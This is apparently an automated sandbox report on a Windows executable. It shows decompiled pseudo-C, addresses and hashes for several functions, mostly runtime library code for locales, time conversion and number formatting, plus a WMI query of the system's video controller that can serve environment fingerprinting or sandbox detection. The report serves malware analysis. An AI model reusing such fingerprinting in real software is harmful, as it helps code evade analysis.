Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: c2bbfe1951e993ec81f277e3179625c8652b62e7d3a059a82c11f95731624302
Instruction ID: c7439f9608b8c8f052815cb7c37f01633d4ad8815d3d8a48d05f79c4e51f4a0d
Opcode Fuzzy Hash: c2bbfe1951e993ec81f277e3179625c8652b62e7d3a059a82c11f95731624302
Instruction Fuzzy Hash: EDC12871904244ABDB249F7E8C81AEB7BB8EF41314F1445AFE4809B352E7388E51C77A

Uniqueness

Uniqueness Score: -1.00%

Function 0042B0D7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0042B0D7(intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _t61;
				void* _t65;
				intOrPtr _t78;
				intOrPtr _t93;
				intOrPtr _t94;
				signed int _t99;

				_t78 = __ecx;
				_push(4);
				L0049D90B(0x4c4a52, __edi, __esi);
				_t93 = _t78;
				_v16 = _t93;
				L00488DEA(_t78, 0);
				_v4 = 0;
				 *((intOrPtr*)(_t93 + 4)) = 0;
				 *((char*)(_t93 + 8)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(_t93 + 0xc)) = 0;
				 *((char*)(_t93 + 0x10)) = 0;
				_v4 = 2;
				 *((intOrPtr*)(_t93 + 0x14)) = 0;
				 *((short*)(_t93 + 0x18)) = 0;
				_v4 = 3;
				 *((intOrPtr*)(_t93 + 0x1c)) = 0;
				 *((short*)(_t93 + 0x20)) = 0;
				_v4 = 4;
				 *((intOrPtr*)(_t93 + 0x24)) = 0;
				 *((char*)(_t93 + 0x28)) = 0;
				_v4 = 5;
				 *((intOrPtr*)(_t93 + 0x2c)) = 0;
				 *((char*)(_t93 + 0x30)) = 0;
				_v4 = 6;
				if(_a8 == 0) {
					E0048902D("bad locale name");
					asm("int3");
					_push(0xffffffff);
					_push(0x4c4ab7);
					_push( *[fs:0x0]);
					_push(_t78);
					_push(0);
					_push(_t93);
					_t61 =  *0x4eb018; // 0xa3bb88a6
					_push(_t61 ^ _t99);
					 *[fs:0x0] =  &_v20;
					_t94 = _t78;
					_v24 = _t94;
					_v12 = 6;
					E0048931A(_t94); // executed
					_v12 = 5;
					if( *((intOrPtr*)(_t94 + 0x2c)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 0x2c)));
					}
					 *((intOrPtr*)(_t94 + 0x2c)) = 0;
					_v8 = 4;
					if( *((intOrPtr*)(_t94 + 0x24)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 0x24)));
					}
					 *((intOrPtr*)(_t94 + 0x24)) = 0;
					_v8 = 3;
					if( *((intOrPtr*)(_t94 + 0x1c)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 0x1c)));
					}
					 *((intOrPtr*)(_t94 + 0x1c)) = 0;
					_v8 = 2;
					if( *((intOrPtr*)(_t94 + 0x14)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 0x14)));
					}
					 *((intOrPtr*)(_t94 + 0x14)) = 0;
					_v8 = 1;
					if( *((intOrPtr*)(_t94 + 0xc)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 0xc)));
					}
					 *((intOrPtr*)(_t94 + 0xc)) = 0;
					_v8 = 0;
					if( *((intOrPtr*)(_t94 + 4)) != 0) {
						L004A5B7B( *((intOrPtr*)(_t94 + 4)));
					}
					 *((intOrPtr*)(_t94 + 4)) = 0;
					_v8 = _v8 | 0xffffffff;
					_t65 = L00488E42(_t94);
					 *[fs:0x0] = _v16;
					return _t65;
				} else {
					E004892CF(_t93, _a8); // executed
					_v4 = _v4 | 0xffffffff;
					return L0049D8D4(_t93);
				}
			}

0x0042b0d7
0x0042b0d7
0x0042b0de
0x0042b0e3
0x0042b0e5
0x0042b0eb
0x0042b0f0
0x0042b0f3
0x0042b0f6
0x0042b0f9
0x0042b0fd
0x0042b100
0x0042b103
0x0042b109
0x0042b10c
0x0042b110
0x0042b114
0x0042b117
0x0042b11b
0x0042b11f
0x0042b122
0x0042b125
0x0042b129
0x0042b12c
0x0042b12f
0x0042b136
0x0042b156
0x0042b15b
0x0042b15f
0x0042b161
0x0042b16c
0x0042b16d
0x0042b16e
0x0042b16f
0x0042b170
0x0042b177
0x0042b17b
0x0042b181
0x0042b183
0x0042b186
0x0042b18e
0x0042b194
0x0042b19c
0x0042b1a1
0x0042b1a6
0x0042b1a9
0x0042b1ac
0x0042b1b3
0x0042b1b8
0x0042b1bd
0x0042b1be
0x0042b1c1
0x0042b1c8
0x0042b1cd
0x0042b1d2
0x0042b1d3
0x0042b1d6
0x0042b1dd
0x0042b1e2
0x0042b1e7
0x0042b1e8
0x0042b1eb
0x0042b1f2
0x0042b1f7
0x0042b1fc
0x0042b1fd
0x0042b200
0x0042b206
0x0042b20b
0x0042b210
0x0042b211
0x0042b214
0x0042b21a
0x0042b222
0x0042b22d
0x0042b138
0x0042b13c
0x0042b143
0x0042b14e
0x0042b14e

APIs

__EH_prolog3.LIBCMT ref: 0042B0DE
std::_Lockit::_Lockit.LIBCPMT ref: 0042B0EB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0042B13C
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0042B18E
std::_Lockit::~_Lockit.LIBCPMT ref: 0042B21A

Strings

bad locale name, xrefs: 0042B151

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$H_prolog3Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3885362349-1405518554
Opcode ID: 2ca577620741fc4d0fa9664d843e3fb6eb30bf736c91008a5dbe1d94b836b8d5
Instruction ID: 6c1aac0d3ae764c151c891031ecf3eb922a7cb345cb057f0399f80213b4349f3
Opcode Fuzzy Hash: 2ca577620741fc4d0fa9664d843e3fb6eb30bf736c91008a5dbe1d94b836b8d5
Instruction Fuzzy Hash: 5341D071805B84DECB21DF6AD54074AFBF0FF19714F108A6FE09A93691C778AA04CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043F667, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(WQL), ref: 0043F67F
SysAllocString.OLEAUT32(SELECT * FROM Win32_VideoController), ref: 0043F688
SysFreeString.OLEAUT32(00000000), ref: 0043F6D2
SysFreeString.OLEAUT32(00000000), ref: 0043F6DD

Strings

WQL, xrefs: 0043F672
SELECT * FROM Win32_VideoController, xrefs: 0043F681

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID: SELECT * FROM Win32_VideoController$WQL
API String ID: 344208780-1929584936
Opcode ID: adc682d61d0390edde9596870ac47e052553ff5eaec596b7a83b409a64427d00
Instruction ID: 4b11ec092bf3f4ee8dee81372b84e2e37407528e88ef9b5c9db828157aa2cc4f
Opcode Fuzzy Hash: adc682d61d0390edde9596870ac47e052553ff5eaec596b7a83b409a64427d00
Instruction Fuzzy Hash: 72118B71A05318AFD324DF64DC89A2BBBE8FF49745F10056EF405CB260CBA1AC04CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004AD519, Relevance: 9.3, APIs: 6, Instructions: 284
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004AD519(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __esi;
				void* __ebp;
				signed int _t61;
				void* _t64;
				signed int _t67;
				signed int _t69;
				signed int _t70;
				signed int _t73;
				signed int _t76;
				intOrPtr _t78;
				signed int _t79;
				void* _t80;
				signed int _t82;
				void* _t83;
				signed int _t85;
				signed int _t91;
				signed int _t100;
				void* _t102;
				signed int _t105;
				signed int* _t108;
				signed int* _t109;
				intOrPtr* _t111;
				signed int _t116;
				signed int _t118;
				signed int _t121;
				void* _t123;
				signed int _t126;
				signed int _t129;
				signed int _t137;
				signed int _t143;
				void _t145;
				void* _t146;
				void* _t148;
				void* _t150;
				signed int _t151;
				signed int _t152;
				void* _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				intOrPtr _t157;

				_t137 = __edx;
				_t153 = _a4;
				if(_t153 == 0) {
					_t111 = E004A966E();
					_t157 = 0x16;
					 *_t111 = _t157;
					L004A5E77();
					return _t157;
				}
				_push(__edi);
				_t121 = 9;
				memset(_t153, _t61 | 0xffffffff, _t121 << 2);
				_t143 = _a8;
				__eflags = _t143;
				if(_t143 == 0) {
					_t109 = E004A966E();
					_t156 = 0x16;
					 *_t109 = _t156;
					L004A5E77();
					_t76 = _t156;
					L12:
					return _t76;
				}
				_push(__ebx);
				__eflags =  *(_t143 + 4);
				if(__eflags <= 0) {
					if(__eflags < 0) {
						L10:
						_t108 = E004A966E();
						_t155 = 0x16;
						 *_t108 = _t155;
						_t76 = _t155;
						L11:
						goto L12;
					}
					__eflags =  *_t143;
					if( *_t143 < 0) {
						goto L10;
					}
				}
				_t64 = 7;
				__eflags =  *(_t143 + 4) - _t64;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						goto L10;
					}
					__eflags =  *_t143 - 0x93406fff;
					if( *_t143 > 0x93406fff) {
						goto L10;
					}
				}
				E004BA429(0, _t143, _t153); // executed
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t67 = L004B99EA( &_v12);
				_pop(_t123);
				__eflags = _t67;
				if(_t67 == 0) {
					_t67 = L004B9A16( &_v16);
					_pop(_t123);
					__eflags = _t67;
					if(_t67 == 0) {
						_t67 = L004B9A42( &_v8);
						_pop(_t123);
						__eflags = _t67;
						if(_t67 == 0) {
							_t116 =  *(_t143 + 4);
							_t126 =  *_t143;
							__eflags = _t116;
							if(__eflags < 0) {
								L28:
								_push(_t143);
								_push(_t153);
								_t76 = L004B9CD7();
								__eflags = _t76;
								if(_t76 != 0) {
									goto L11;
								}
								__eflags = _v12;
								asm("cdq");
								_t145 =  *_t153;
								_t118 = _t137;
								if(__eflags == 0) {
									L32:
									_t78 = _v8;
									L33:
									asm("cdq");
									_t146 = _t145 - _t78;
									asm("sbb ebx, edx");
									_t79 = L004C3F60(_t146, _t118, 0x3c, 0);
									 *_t153 = _t79;
									__eflags = _t79;
									if(_t79 < 0) {
										_t146 = _t146 + 0xffffffc4;
										 *_t153 = _t79 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t80 = L004C3EB0(_t146, _t118, 0x3c, 0);
									_t119 = _t137;
									asm("cdq");
									_t148 = _t80 +  *(_t153 + 4);
									asm("adc ebx, edx");
									_t82 = L004C3F60(_t148, _t137, 0x3c, 0);
									 *(_t153 + 4) = _t82;
									__eflags = _t82;
									if(_t82 < 0) {
										_t148 = _t148 + 0xffffffc4;
										 *(_t153 + 4) = _t82 + 0x3c;
										asm("adc ebx, 0xffffffff");
									}
									_t83 = L004C3EB0(_t148, _t119, 0x3c, 0);
									_t120 = _t137;
									asm("cdq");
									_t150 = _t83 +  *(_t153 + 8);
									asm("adc ebx, edx");
									_t85 = L004C3F60(_t150, _t137, 0x18, 0);
									 *(_t153 + 8) = _t85;
									__eflags = _t85;
									if(_t85 < 0) {
										_t150 = _t150 + 0xffffffe8;
										 *(_t153 + 8) = _t85 + 0x18;
										asm("adc ebx, 0xffffffff");
									}
									_t129 = L004C3EB0(_t150, _t120, 0x18, 0);
									__eflags = _t137;
									if(__eflags < 0) {
										L48:
										 *(_t153 + 0xc) =  *(_t153 + 0xc) + _t129;
										asm("cdq");
										_t151 = 7;
										_t91 =  *(_t153 + 0xc);
										 *(_t153 + 0x18) = ( *(_t153 + 0x18) + 7 + _t129) % _t151;
										__eflags = _t91;
										if(_t91 > 0) {
											goto L43;
										}
										 *((intOrPtr*)(_t153 + 0x10)) = 0xb;
										 *(_t153 + 0xc) = _t91 + 0x1f;
										_t55 = _t129 + 0x16d; // 0x16d
										 *(_t153 + 0x1c) =  *(_t153 + 0x1c) + _t55;
										 *((intOrPtr*)(_t153 + 0x14)) =  *((intOrPtr*)(_t153 + 0x14)) - 1;
										goto L44;
									} else {
										if(__eflags > 0) {
											L42:
											asm("cdq");
											_t152 = 7;
											_t39 = _t153 + 0xc;
											 *_t39 =  *(_t153 + 0xc) + _t129;
											__eflags =  *_t39;
											 *(_t153 + 0x18) = ( *(_t153 + 0x18) + _t129) % _t152;
											L43:
											_t42 = _t153 + 0x1c;
											 *_t42 =  *(_t153 + 0x1c) + _t129;
											__eflags =  *_t42;
											L44:
											_t76 = 0;
											goto L11;
										}
										__eflags = _t129;
										if(_t129 == 0) {
											__eflags = _t137;
											if(__eflags > 0) {
												goto L44;
											}
											if(__eflags < 0) {
												goto L48;
											}
											__eflags = _t129;
											if(_t129 >= 0) {
												goto L44;
											}
											goto L48;
										}
										goto L42;
									}
								}
								_push(_t153);
								_t100 = E004BA47A(_t118, _t145, _t153, __eflags);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L32;
								}
								_t78 = _v8 + _v16;
								 *((intOrPtr*)(_t153 + 0x20)) = 1;
								goto L33;
							}
							if(__eflags > 0) {
								L20:
								_t102 = 7;
								__eflags = _t116 - _t102;
								if(__eflags > 0) {
									goto L28;
								}
								if(__eflags < 0) {
									L23:
									asm("cdq");
									_push( &_v24);
									asm("sbb ebx, edx");
									_v24 = _t126 - _v8;
									_push(_t153);
									_v20 = _t116;
									_t76 = L004B9CD7();
									__eflags = _t76;
									if(_t76 != 0) {
										goto L11;
									}
									__eflags = _v12 - _t76;
									if(__eflags == 0) {
										goto L44;
									}
									_push(_t153);
									_t105 = E004BA47A(_t116, _t143, _t153, __eflags);
									__eflags = _t105;
									if(_t105 == 0) {
										goto L44;
									}
									asm("cdq");
									_v24 = _v24 - _v16;
									_push( &_v24);
									asm("sbb [ebp-0x10], edx");
									_push(_t153);
									_t76 = L004B9CD7();
									__eflags = _t76;
									if(_t76 != 0) {
										goto L11;
									}
									 *((intOrPtr*)(_t153 + 0x20)) = 1;
									goto L44;
								}
								__eflags = _t126 - 0x933c7b7f;
								if(_t126 >= 0x933c7b7f) {
									goto L28;
								}
								goto L23;
							}
							__eflags = _t126 - 0x3f480;
							if(_t126 <= 0x3f480) {
								goto L28;
							}
							goto L20;
						}
					}
				}
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				L004A5EA4(_t67);
				asm("int3");
				_push(_t153);
				_t69 = L004B9C99(_t123);
				_t154 = _t69;
				__eflags = _t154;
				if(_t154 != 0) {
					_push(_v20);
					_push(_t154); // executed
					_t70 = E004AD519(0, _t137, _t143); // executed
					asm("sbb eax, eax");
					_t73 =  !( ~_t70) & _t154;
					__eflags = _t73;
					return _t73;
				}
				return _t69;
			}

0x004ad519
0x004ad522
0x004ad527
0x004ad529
0x004ad530
0x004ad531
0x004ad533
0x00000000
0x004ad538
0x004ad53c
0x004ad544
0x004ad545
0x004ad547
0x004ad54a
0x004ad54c
0x004ad54e
0x004ad555
0x004ad556
0x004ad558
0x004ad55d
0x004ad58e
0x00000000
0x004ad58e
0x004ad561
0x004ad564
0x004ad567
0x004ad569
0x004ad581
0x004ad581
0x004ad588
0x004ad589
0x004ad58b
0x004ad58d
0x00000000
0x004ad58d
0x004ad56b
0x004ad56d
0x00000000
0x00000000
0x004ad56d
0x004ad571
0x004ad572
0x004ad575
0x004ad577
0x00000000
0x00000000
0x004ad579
0x004ad57f
0x00000000
0x00000000
0x004ad57f
0x004ad594
0x004ad59c
0x004ad5a0
0x004ad5a3
0x004ad5a6
0x004ad5ab
0x004ad5ac
0x004ad5ae
0x004ad5b8
0x004ad5bd
0x004ad5be
0x004ad5c0
0x004ad5ca
0x004ad5cf
0x004ad5d0
0x004ad5d2
0x004ad5d8
0x004ad5db
0x004ad5dd
0x004ad5df
0x004ad660
0x004ad660
0x004ad661
0x004ad662
0x004ad669
0x004ad66b
0x00000000
0x00000000
0x004ad671
0x004ad677
0x004ad678
0x004ad67a
0x004ad67c
0x004ad698
0x004ad698
0x004ad69b
0x004ad69b
0x004ad69c
0x004ad6a2
0x004ad6a6
0x004ad6ab
0x004ad6ad
0x004ad6af
0x004ad6b4
0x004ad6b7
0x004ad6b9
0x004ad6b9
0x004ad6c2
0x004ad6c9
0x004ad6ce
0x004ad6cf
0x004ad6d5
0x004ad6d9
0x004ad6de
0x004ad6e1
0x004ad6e3
0x004ad6e8
0x004ad6eb
0x004ad6ee
0x004ad6ee
0x004ad6f7
0x004ad6fe
0x004ad703
0x004ad704
0x004ad70a
0x004ad70e
0x004ad713
0x004ad716
0x004ad718
0x004ad71d
0x004ad720
0x004ad723
0x004ad723
0x004ad731
0x004ad733
0x004ad735
0x004ad762
0x004ad768
0x004ad76f
0x004ad770
0x004ad773
0x004ad776
0x004ad779
0x004ad77b
0x00000000
0x00000000
0x004ad780
0x004ad787
0x004ad78a
0x004ad790
0x004ad793
0x00000000
0x004ad737
0x004ad737
0x004ad73d
0x004ad744
0x004ad745
0x004ad748
0x004ad748
0x004ad748
0x004ad74b
0x004ad74e
0x004ad74e
0x004ad74e
0x004ad74e
0x004ad751
0x004ad751
0x00000000
0x004ad751
0x004ad739
0x004ad73b
0x004ad758
0x004ad75a
0x00000000
0x00000000
0x004ad75c
0x00000000
0x00000000
0x004ad75e
0x004ad760
0x00000000
0x00000000
0x00000000
0x004ad760
0x00000000
0x004ad73b
0x004ad735
0x004ad67e
0x004ad67f
0x004ad685
0x004ad687
0x00000000
0x00000000
0x004ad68c
0x004ad68f
0x00000000
0x004ad68f
0x004ad5e1
0x004ad5eb
0x004ad5ed
0x004ad5ee
0x004ad5f0
0x00000000
0x00000000
0x004ad5f2
0x004ad5fc
0x004ad5ff
0x004ad605
0x004ad606
0x004ad608
0x004ad60b
0x004ad60c
0x004ad60f
0x004ad616
0x004ad618
0x00000000
0x00000000
0x004ad61e
0x004ad621
0x00000000
0x00000000
0x004ad627
0x004ad628
0x004ad62e
0x004ad630
0x00000000
0x00000000
0x004ad639
0x004ad63a
0x004ad640
0x004ad641
0x004ad644
0x004ad645
0x004ad64c
0x004ad64e
0x00000000
0x00000000
0x004ad654
0x00000000
0x004ad654
0x004ad5f4
0x004ad5fa
0x00000000
0x00000000
0x00000000
0x004ad5fa
0x004ad5e3
0x004ad5e9
0x00000000
0x00000000
0x00000000
0x004ad5e9
0x004ad5d2
0x004ad5c0
0x004ad798
0x004ad799
0x004ad79a
0x004ad79b
0x004ad79c
0x004ad79d
0x004ad7a2
0x004ad7a8
0x004ad7a9
0x004ad7ae
0x004ad7b0
0x004ad7b2
0x004ad7b4
0x004ad7b7
0x004ad7b8
0x004ad7c0
0x004ad7c5
0x004ad7c5
0x00000000
0x004ad7c5
0x004ad7c9

APIs

__allrem.LIBCMT ref: 004AD6A6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AD6C2
__allrem.LIBCMT ref: 004AD6D9
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AD6F7
__allrem.LIBCMT ref: 004AD70E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004AD72C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 9c68534bc58ca450419da227a5f710ec40ff671fe3a058431bf23149e8cc63be
Instruction ID: 654fca63a13bbe54f081c1f28274ad463728d2dd87b098e0be7b463a35528337
Opcode Fuzzy Hash: 9c68534bc58ca450419da227a5f710ec40ff671fe3a058431bf23149e8cc63be
Instruction Fuzzy Hash: 7C813776E00706ABD7249E29CC41BAB73E8AF26728F24452FF512D7B81E778DD008758

Uniqueness

Uniqueness Score: -1.00%

Function 004AE22E, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004AE22E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t74;
				intOrPtr _t75;
				signed int _t78;
				intOrPtr _t86;
				void* _t95;
				signed int _t97;
				void* _t99;
				void* _t106;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				void* _t118;
				signed int _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t126;
				intOrPtr _t128;
				signed int _t129;
				void* _t133;
				void* _t134;
				void* _t136;

				_t118 = __edx;
				_t95 = __ebx;
				_push(_t99);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t121 = 0;
					_t67 = E004BA7E9( &_v8, 0, 0, _a8, 0x7fffffff);
					_t134 = _t133 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t126 = E004B2F72(_t99, _v8, 2);
						__eflags = _t126;
						if(_t126 == 0) {
							L11:
							E004B2FCF(_t126);
							_t70 = _t121;
							goto L12;
						} else {
							_t67 = E004BA7E9(_t121, _t126, _v8, _a8, 0xffffffff);
							_t134 = _t134 + 0x14;
							__eflags = _t67;
							if(_t67 == 0) {
								_t71 = E004B2387(_a4, _t126); // executed
								_t121 = _t71;
								goto L11;
							} else {
								__eflags = _t67 - 0x16;
								if(_t67 == 0x16) {
									goto L13;
								} else {
									__eflags = _t67 - 0x22;
									if(_t67 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t121);
							_push(_t121);
							_push(_t121);
							_push(_t121);
							L004A5EA4(_t67);
							asm("int3");
							L0049DF50(0x4e8970, 0x1c);
							_t128 = _a4;
							_t74 = E004AE22E(_t95, _t118, _t121, _t128, _t128, _a8); // executed
							_t106 = _t121;
							_t123 = _t74;
							__eflags = _t123;
							if(_t123 != 0) {
								_t75 = E004B361B(_t95, _t106, _t118);
								_v40 = _t75;
								_v48 =  *((intOrPtr*)(_t75 + 0x4c));
								_t108 =  *((intOrPtr*)(_t75 + 0x48));
								_v44 =  *((intOrPtr*)(_t75 + 0x48));
								_v32 = 0;
								_t78 = L004BAA8A( *((intOrPtr*)(_t75 + 0x48)),  &_v32, 0, 0, _t123, 0,  &_v48);
								_t136 = _t134 + 0x18;
								__eflags = _t78;
								if(_t78 == 0) {
									L22:
									_t97 = E004B3009(_t108, _v32 + 4);
									__eflags = _t97;
									if(_t97 == 0) {
										goto L15;
									} else {
										_t20 = _t97 + 4; // 0x4
										_v36 = _t20;
										_t108 =  &_v48;
										_t123 = 0;
										_t78 = L004BAA8A( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t136 = _t136 + 0x18;
										__eflags = _t78;
										if(_t78 == 0) {
											L29:
											_t124 = _v48;
											E004AE1BD(4);
											_pop(_t110);
											_v8 = _v8 & 0x00000000;
											_t129 = _t128 + _t128;
											_t111 = _t110 | 0xffffffff;
											__eflags =  *(_t124 + 0x24 + _t129 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E004B2FCF( *(_t124 + 0x24 + _t129 * 8));
													_pop(_t114);
													 *(_t124 + 0x24 + _t129 * 8) =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
													_t111 = _t114 | 0xffffffff;
													__eflags = _t111;
												}
											}
											_t86 = _v40;
											__eflags =  *(_t86 + 0x350) & 0x00000002;
											if(( *(_t86 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x4eb470 & 0x00000001;
												if(( *0x4eb470 & 0x00000001) == 0) {
													__eflags =  *(_t124 + 0x24 + _t129 * 8);
													if( *(_t124 + 0x24 + _t129 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t111 == 1;
														if(_t111 == 1) {
															E004B2FCF( *(_t124 + 0x24 + _t129 * 8));
															_t51 = _t124 + 0x24 + _t129 * 8;
															 *_t51 =  *(_t124 + 0x24 + _t129 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t97 =  *((intOrPtr*)(_t124 + 0xc));
											 *(_t124 + 0x24 + _t129 * 8) = _t97;
											 *((intOrPtr*)(_t124 + 0x1c + _t129 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E004AE41F();
										} else {
											__eflags = _t78 - 0x16;
											if(_t78 == 0x16) {
												L26:
												_push(_t123);
												_push(_t123);
												_push(_t123);
												_push(_t123);
												_push(_t123);
												goto L20;
											} else {
												__eflags = _t78 - 0x22;
												if(_t78 != 0x22) {
													__eflags = _t78;
													if(_t78 == 0) {
														goto L29;
													} else {
														E004B2FCF(_t97);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t78 - 0x16;
									if(_t78 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t78 = L004A5EA4(_t78);
									} else {
										__eflags = _t78 - 0x22;
										if(_t78 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t78;
									if(_t78 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return L0049DF96();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E004B2387(_a4, 0); // executed
					L12:
					return _t70;
				}
			}

0x004ae22e
0x004ae22e
0x004ae233
0x004ae238
0x004ae248
0x004ae249
0x004ae252
0x004ae25a
0x004ae25f
0x004ae262
0x004ae264
0x004ae270
0x004ae27a
0x004ae27e
0x004ae280
0x004ae2b1
0x004ae2b2
0x004ae2b8
0x00000000
0x004ae282
0x004ae28c
0x004ae291
0x004ae294
0x004ae296
0x004ae2a8
0x004ae2af
0x00000000
0x004ae298
0x004ae298
0x004ae29b
0x00000000
0x004ae29d
0x004ae29d
0x004ae2a0
0x00000000
0x004ae2a2
0x00000000
0x004ae2a2
0x004ae2a0
0x004ae29b
0x004ae296
0x004ae266
0x004ae266
0x004ae269
0x004ae2c0
0x004ae2c0
0x004ae2c1
0x004ae2c2
0x004ae2c3
0x004ae2c5
0x004ae2ca
0x004ae2d2
0x004ae2da
0x004ae2de
0x004ae2e4
0x004ae2e5
0x004ae2e7
0x004ae2e9
0x004ae2f2
0x004ae2f7
0x004ae2fd
0x004ae300
0x004ae303
0x004ae308
0x004ae317
0x004ae31c
0x004ae31f
0x004ae321
0x004ae33b
0x004ae348
0x004ae34a
0x004ae34c
0x00000000
0x004ae34e
0x004ae34e
0x004ae351
0x004ae354
0x004ae35f
0x004ae362
0x004ae367
0x004ae36a
0x004ae36c
0x004ae38f
0x004ae38f
0x004ae394
0x004ae399
0x004ae39a
0x004ae39e
0x004ae3a4
0x004ae3a7
0x004ae3a9
0x004ae3ad
0x004ae3b1
0x004ae3b7
0x004ae3bc
0x004ae3bd
0x004ae3c2
0x004ae3c2
0x004ae3c2
0x004ae3b1
0x004ae3c5
0x004ae3c8
0x004ae3cf
0x004ae3d1
0x004ae3d8
0x004ae3de
0x004ae3e0
0x004ae3e2
0x004ae3e6
0x004ae3e7
0x004ae3ed
0x004ae3f3
0x004ae3f3
0x004ae3f3
0x004ae3f3
0x004ae3e7
0x004ae3e0
0x004ae3d8
0x004ae3fb
0x004ae3fd
0x004ae404
0x004ae408
0x004ae40f
0x004ae36e
0x004ae36e
0x004ae371
0x004ae378
0x004ae378
0x004ae379
0x004ae37a
0x004ae37b
0x004ae37c
0x00000000
0x004ae373
0x004ae373
0x004ae376
0x004ae37f
0x004ae381
0x00000000
0x004ae383
0x004ae384
0x00000000
0x004ae389
0x00000000
0x00000000
0x00000000
0x004ae376
0x004ae371
0x004ae36c
0x004ae323
0x004ae323
0x004ae326
0x004ae32d
0x004ae32d
0x004ae32e
0x004ae32f
0x004ae330
0x004ae331
0x004ae332
0x004ae332
0x004ae328
0x004ae328
0x004ae32b
0x00000000
0x00000000
0x004ae32b
0x004ae337
0x004ae339
0x00000000
0x00000000
0x00000000
0x00000000
0x004ae339
0x004ae2eb
0x004ae2eb
0x004ae2eb
0x004ae41b
0x004ae26b
0x004ae26b
0x004ae26e
0x00000000
0x00000000
0x00000000
0x00000000
0x004ae26e
0x004ae269
0x004ae23a
0x004ae23f
0x004ae2bc
0x004ae2bf
0x004ae2bf

APIs

__cftoe.LIBCMT ref: 004AE25A
__cftoe.LIBCMT ref: 004AE28C

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
